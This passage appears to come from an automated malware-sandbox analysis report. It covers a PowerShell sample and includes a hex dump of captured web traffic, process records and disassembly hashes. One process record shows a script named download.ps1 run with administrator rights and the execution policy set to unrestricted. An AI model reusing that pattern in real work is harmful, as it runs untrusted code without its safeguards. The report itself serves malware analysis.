                                                                                                  Data Ascii: zt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:rela
                                                                                                  Jan 11, 2025 10:01:52.800792933 CET1289INData Raw: 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 30 3b 2a 70 61 64 64 69 6e
                                                                                                  Data Ascii: mage:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbt
                                                                                                  Jan 11, 2025 10:01:52.800919056 CET1289INData Raw: 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31 2c 2e 67
                                                                                                  Data Ascii: argin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:
                                                                                                  Jan 11, 2025 10:01:52.801021099 CET1289INData Raw: 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69
                                                                                                  Data Ascii: gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.
                                                                                                  Jan 11, 2025 10:01:52.918761015 CET1289INData Raw: 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b
                                                                                                  Data Ascii: gbxv{visibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-we


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:04:01:47
                                                                                                  Start date:11/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                  Imagebase:0x7ff6c5a60000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:04:01:47
                                                                                                  Start date:11/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7e17f0000
                                                                                                  File size:875'008 bytes
                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Executed Functions

                                                                                                    Function 00007FFA34332F06 Relevance: 2.0, Strings: 1, Instructions: 794COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662856563.00007FFA34330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34330000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34330000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @C
                                                                                                    • API String ID: 0-1618053064
                                                                                                    • Opcode ID: f53ee723db2d49ca088aeeb912a290df5777cf382344de2f6a948f4d94119c41
                                                                                                    • Instruction ID: ad6fef563bffb60bdb43c2faba55730c677361b543f4cf8fd51e1eab0ec7d497
                                                                                                    • Opcode Fuzzy Hash: f53ee723db2d49ca088aeeb912a290df5777cf382344de2f6a948f4d94119c41
                                                                                                    • Instruction Fuzzy Hash: 2D325421A0CB864FE796D76898955B07BE1EF57220B1C81FFE44DC7193DD2AAC46C382
                                                                                                    Function 00007FFA34097B01 Relevance: .4, Instructions: 397COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 50752a0e3402ac97815e590154b2abded9090fe26e2b74e87fb97306386f016b
                                                                                                    • Instruction ID: 6aec30427f70bf14565b2cc6e5e58d99458c614538efdd3dd6d18a94744d5a28
                                                                                                    • Opcode Fuzzy Hash: 50752a0e3402ac97815e590154b2abded9090fe26e2b74e87fb97306386f016b
                                                                                                    • Instruction Fuzzy Hash: 46D16231A18A4D8FEBA8DF28C8457F977E1FB59300F14826ED80DC7295DF3999448B81
                                                                                                    Function 00007FFA340988B1 Relevance: .4, Instructions: 380COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6e0c1ecc6a0260bce2ccd6156268014affeeffeb526bb0807aa4fcfcac96fe92
                                                                                                    • Instruction ID: 3d1d1c0296b52d71293193dac6f68bed66846e8ae13899a4bf8e58d5755d487b
                                                                                                    • Opcode Fuzzy Hash: 6e0c1ecc6a0260bce2ccd6156268014affeeffeb526bb0807aa4fcfcac96fe92
                                                                                                    • Instruction Fuzzy Hash: FCD17231A18A4D8FEBA8DF28C8957E977E1FB59300F14822ED80DC7295CF7999458B81
                                                                                                    Function 00007FFA343014F6 Relevance: 3.0, Strings: 2, Instructions: 536COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Xz#n$Xz#n
                                                                                                    • API String ID: 0-2844086146
                                                                                                    • Opcode ID: f0dd5cc557bcef34c873048a2e8c0c6cb588a4104c3a61f6fcbca076ba1eb9f2
                                                                                                    • Instruction ID: 1d4f8235a65b338ff0036fafb6bbb32d2453390a39eba8eea810e86464f3af56
                                                                                                    • Opcode Fuzzy Hash: f0dd5cc557bcef34c873048a2e8c0c6cb588a4104c3a61f6fcbca076ba1eb9f2
                                                                                                    • Instruction Fuzzy Hash: CD02386191CB864FEBA997288896275FBE1FF56300F1882BDD40EC72D3DD3AAC458741
                                                                                                    Function 00007FFA343015B6 Relevance: 2.9, Strings: 2, Instructions: 443COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Xz#n$Xz#n
                                                                                                    • API String ID: 0-2844086146
                                                                                                    • Opcode ID: 7aa9fdd2ae6070de83931b6b0ac0cfdf46d7f941e6993c45f0e6f594e8beb79e
                                                                                                    • Instruction ID: 6b0957fc3005e7e39b5a08413157236e74ea56b5e8d98f4dd721b95f7d7ec008
                                                                                                    • Opcode Fuzzy Hash: 7aa9fdd2ae6070de83931b6b0ac0cfdf46d7f941e6993c45f0e6f594e8beb79e
                                                                                                    • Instruction Fuzzy Hash: 99E13A6191CB8A4FEB6897188896275FBE1FF56300F1882BDD41EC72D3DD3AAC058781
                                                                                                    Function 00007FFA34083379 Relevance: 2.9, Strings: 2, Instructions: 394COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @q&4$`p&4
                                                                                                    • API String ID: 0-3525029564
                                                                                                    • Opcode ID: afcd50ad31273a8e97700afef28ac74cabf5fe148bcb1fb340462c9eec06bd82
                                                                                                    • Instruction ID: 900f3e65dbc06f25a4cc80ce08d5edb2157b5e90fa8e6d3b9c0eaf98a5980c35
                                                                                                    • Opcode Fuzzy Hash: afcd50ad31273a8e97700afef28ac74cabf5fe148bcb1fb340462c9eec06bd82
                                                                                                    • Instruction Fuzzy Hash: 54D17430A18A4D8FDF95DF68C495AA97BF1FFAA310F14816AD40DD7255CE3AE841CB80
                                                                                                    Function 00007FFA340984C1 Relevance: .3, Instructions: 256COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 29555740b98928f05e4c9d73e51e1bcd913f250b6e85557e1bb723e2b1a1825f
                                                                                                    • Instruction ID: ebdf1af8078259c4917c396bf9b98bcc201d5a65ffdae87ca1a20fd3da177571
                                                                                                    • Opcode Fuzzy Hash: 29555740b98928f05e4c9d73e51e1bcd913f250b6e85557e1bb723e2b1a1825f
                                                                                                    • Instruction Fuzzy Hash: 0B915131618A4D8FDBA8EF28D8957E977E1FB59300F14823AE84DC7395CF7899448B81
                                                                                                    Function 00007FFA34332F2A Relevance: .2, Instructions: 217COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662856563.00007FFA34330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34330000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34330000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d120ddbe4e7d9cde7fac1be41add5117254a75262ff1db5d8304cc5b1e52ddfb
                                                                                                    • Instruction ID: 253982ddb25036d7beca5e914842846e160ec0ae77ee9d55f1c2014ecc2f63ea
                                                                                                    • Opcode Fuzzy Hash: d120ddbe4e7d9cde7fac1be41add5117254a75262ff1db5d8304cc5b1e52ddfb
                                                                                                    • Instruction Fuzzy Hash: 4161E36150E7C60FD393977898A55A13FE1EF57220B0E81EFD489CF0A3D92A9C4AC352
                                                                                                    Function 00007FFA34092010 Relevance: .2, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16c8cfdf684ff45f6f5e3f140d6bcda0640b975eab8fdaa54ad692587859dab5
                                                                                                    • Instruction ID: 1f854fea8d17d54c23684b36dc6857d40576e3c2bf025bf2135892d46751890e
                                                                                                    • Opcode Fuzzy Hash: 16c8cfdf684ff45f6f5e3f140d6bcda0640b975eab8fdaa54ad692587859dab5
                                                                                                    • Instruction Fuzzy Hash: 96415A7191CB885FEB199B5CA8466B97FF0EB9A310F04816FE44DC3293CA256C16C7C2
                                                                                                    Function 00007FFA340928D8 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5da0526f094bd2b1e03c450b2a6719a1ce821bd63ac43ff7f7d384428bf64d40
                                                                                                    • Instruction ID: b8aae93e7abebc4b6b168deeecdbfeb159761c72a4b7d1e53041fa9e2aacc037
                                                                                                    • Opcode Fuzzy Hash: 5da0526f094bd2b1e03c450b2a6719a1ce821bd63ac43ff7f7d384428bf64d40
                                                                                                    • Instruction Fuzzy Hash: 3A213A3190CB4C4FDB59DFAC98497E97BE0EB96320F04826FD44CC3152CA749809CB91
                                                                                                    Function 00007FFA34097F44 Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 578af56d8f1bda1c482a3adfa43cda774df480150a0e9e1590927f200cdb741a
                                                                                                    • Instruction ID: d03bdfc80762edee806a90ea5e078341475c2a31059ee8edfb74c99360e7dfc6
                                                                                                    • Opcode Fuzzy Hash: 578af56d8f1bda1c482a3adfa43cda774df480150a0e9e1590927f200cdb741a
                                                                                                    • Instruction Fuzzy Hash: 6C31F931A1864ECEEBB49F14CC99BF93291FF47315F408139D84DC61A2CE3E6945DA11
                                                                                                    Function 00007FFA33F6F3FF Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1657384528.00007FFA33F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA33F6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa33f6d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 72cf00af18adb52640cc861cce60e261b51ceee4c0257a99186e753114b61bb4
                                                                                                    • Instruction ID: 15f3e00758f0ebf28302773ed8a7a5cb13565f53457bdce4c4c21eb798c70ee0
                                                                                                    • Opcode Fuzzy Hash: 72cf00af18adb52640cc861cce60e261b51ceee4c0257a99186e753114b61bb4
                                                                                                    • Instruction Fuzzy Hash: B6012C3160CE088F9AA4EF1EE48595137E0FB98320710465AD41DC755ADA31F891CBC1
                                                                                                    Function 00007FFA34084AB5 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d800e357b5988fb3d66faf6768f5efba26aa4b028043252d6bbf1e92ca8120e2
                                                                                                    • Instruction ID: 76a75f66fecafb9939f48fb190befe1331f794def9a65abb0dcf6ba11625cda4
                                                                                                    • Opcode Fuzzy Hash: d800e357b5988fb3d66faf6768f5efba26aa4b028043252d6bbf1e92ca8120e2
                                                                                                    • Instruction Fuzzy Hash: 1A01677111CB0C4FD744EF0CE491AA5B7E0FB95324F10056DE58AC3651DB36E892CB45
                                                                                                    Function 00007FFA34331E92 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662856563.00007FFA34330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34330000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34330000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 77c3dec49588d68afe840908688fa69718a661ee288389afc14673b186e01629
                                                                                                    • Instruction ID: 80fbc6d7aa43e371e75c0a20eb23d7f04701f8cd455df9acb6f2ee84b9da9ffc
                                                                                                    • Opcode Fuzzy Hash: 77c3dec49588d68afe840908688fa69718a661ee288389afc14673b186e01629
                                                                                                    • Instruction Fuzzy Hash: DAF01D32A1CA548FDB68EB4CE8868A477E1EF4632071440B6E14DC7953DB27AC058785
                                                                                                    Function 00007FFA34092720 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9dc2aab4395b3c27959a1a7a1f8fec6172a3869a43034f01b2b921296dc53e73
                                                                                                    • Instruction ID: af28b22612eac65543e1f1eeb677983ea2add22d19865190f51dcaf368a5f0dd
                                                                                                    • Opcode Fuzzy Hash: 9dc2aab4395b3c27959a1a7a1f8fec6172a3869a43034f01b2b921296dc53e73
                                                                                                    • Instruction Fuzzy Hash: 6CF0F63180C7C98FDB46DF2898458E5BFA0EF27250F04069AE44CC70A2DA659858CB92

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFA3408E862 Relevance: 17.0, Strings: 13, Instructions: 738COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: A4$0A4$8A4$@A4$PA4$XA4$[L_I$\L_I$`A4$hA4$xA4$A4$A4
                                                                                                    • API String ID: 0-135437072
                                                                                                    • Opcode ID: f596777e0a9ebede4e6e4d2136c94452133d03dbe12df05e077858a47c61d41c
                                                                                                    • Instruction ID: 32acc81a5de764b43083b968208c9b302dd50ecd085f6a3e3fb19e4e80821a65
                                                                                                    • Opcode Fuzzy Hash: f596777e0a9ebede4e6e4d2136c94452133d03dbe12df05e077858a47c61d41c
                                                                                                    • Instruction Fuzzy Hash: D622B396B0EBC14AE665439C3C561796FA0EF93225B1881FBD48CD74DB981EDD0A83C3
                                                                                                    Function 00007FFA3408C432 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 314$114
                                                                                                    • API String ID: 0-893210604
                                                                                                    • Opcode ID: 3d0b5b1189738fc7dedb54b1c418423ed527def22c584ecd3ecca665c1a4307a
                                                                                                    • Instruction ID: 41fcc29e5b0971ed2d13d74058ffac2d96cbce7fdcc25a4e194c03a15c2b2f1b
                                                                                                    • Opcode Fuzzy Hash: 3d0b5b1189738fc7dedb54b1c418423ed527def22c584ecd3ecca665c1a4307a
                                                                                                    • Instruction Fuzzy Hash: 2EF1A531A0CA4E8FEB95DB5CC495AE97BF1FF5A310F1441BAD40DD7196CE26A881C780
                                                                                                    Function 00007FFA340855DA Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 0-4088798008
                                                                                                    • Opcode ID: 5e49745027fae1db970983d41e3b7762641431b492ccab89bfe96244932611bf
                                                                                                    • Instruction ID: b4d0bb4b469b8efdf8808e95188a8f16d7e464953883ebbc457bbfd31d2434b2
                                                                                                    • Opcode Fuzzy Hash: 5e49745027fae1db970983d41e3b7762641431b492ccab89bfe96244932611bf
                                                                                                    • Instruction Fuzzy Hash: D1416347B0D7D21AF39253BC69A90E53F90DF532F5B0950B7C988CB4939D0F181B9691
                                                                                                    Function 00007FFA3408C141 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34080000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4
                                                                                                    • API String ID: 0-4088798008
                                                                                                    • Opcode ID: cd959121d201e4a71d94a35f8478e86ec73f6816d7a1b0355a625bfea6a34f56
                                                                                                    • Instruction ID: f159cd2f8fe5f033f5bcc64164602c85ad44fe294c1aa3b70229259995ba33a6
                                                                                                    • Opcode Fuzzy Hash: cd959121d201e4a71d94a35f8478e86ec73f6816d7a1b0355a625bfea6a34f56
                                                                                                    • Instruction Fuzzy Hash: 8F41BF6690DAC30BF757473859E92913FE0EF63218F0D41EACA88CE4A3DE1E641A9301
                                                                                                    Function 00007FFA34307B43 Relevance: .6, Instructions: 577COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f979de86339182d32d996dd7a08c265b579e44ea7a57971621d0b7d9e976ef29
                                                                                                    • Instruction ID: 3e13177e54188c5855246cc43416eb1143fc71fd2651f693884bcf35879ee442
                                                                                                    • Opcode Fuzzy Hash: f979de86339182d32d996dd7a08c265b579e44ea7a57971621d0b7d9e976ef29
                                                                                                    • Instruction Fuzzy Hash: F102D52190EBC54FE75697388895961BFE1EF17210B1941FEC48ECB1A3DE2AEC46C781
                                                                                                    Function 00007FFA343087D3 Relevance: .5, Instructions: 510COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1eede9bfe672c715dc5e18ebe5f0f7d712dcbfeb9c7d4161e951994d062fb841
                                                                                                    • Instruction ID: b5c755e5d6dc7d8e9400619d22bec070cc5745be5a3ca105cf81a2428f07ac1b
                                                                                                    • Opcode Fuzzy Hash: 1eede9bfe672c715dc5e18ebe5f0f7d712dcbfeb9c7d4161e951994d062fb841
                                                                                                    • Instruction Fuzzy Hash: DBE1C22160EBC54FDB5A9B3C88949617FE1EF57210B0941EEC48ECF1A3D92ADC4AC791
                                                                                                    Function 00007FFA34307723 Relevance: .5, Instructions: 476COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b14ad96bcf0a3b0afa5f3fb608a8a9e7a7ffdc2c67b2ab80c715eecf39c0664e
                                                                                                    • Instruction ID: 101aa54fd50c6fc78918b98f8415e21131ea6bd1db8d3bc91355e70293c5eda2
                                                                                                    • Opcode Fuzzy Hash: b14ad96bcf0a3b0afa5f3fb608a8a9e7a7ffdc2c67b2ab80c715eecf39c0664e
                                                                                                    • Instruction Fuzzy Hash: 55E1D521A0DBC64FDB96973888955607FE1EF27310B1941FAC44ECB1A3DE2AEC46C391
                                                                                                    Function 00007FFA34304DB3 Relevance: .4, Instructions: 401COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1662417722.00007FFA34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34300000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ffa34300000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9986d5a74508f20d92c544178660e0dd5be194b266af63976eed36ad85fee203
                                                                                                    • Instruction ID: e9481c835131d42cc56ce6936c114bbf63f289715936dbd3e0b8b2abf995f84e
                                                                                                    • Opcode Fuzzy Hash: 9986d5a74508f20d92c544178660e0dd5be194b266af63976eed36ad85fee203
                                                                                                    • Instruction Fuzzy Hash: 20B1F72160DBC54FD7569B2C88A49617FE1EF67310B1942FAC48ECB1A3D92AEC46C391
                                                                                                    Function 00007FFA340922D8 Relevance: .4, Instructions: 383COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1658002840.00007FFA34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFA34080000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
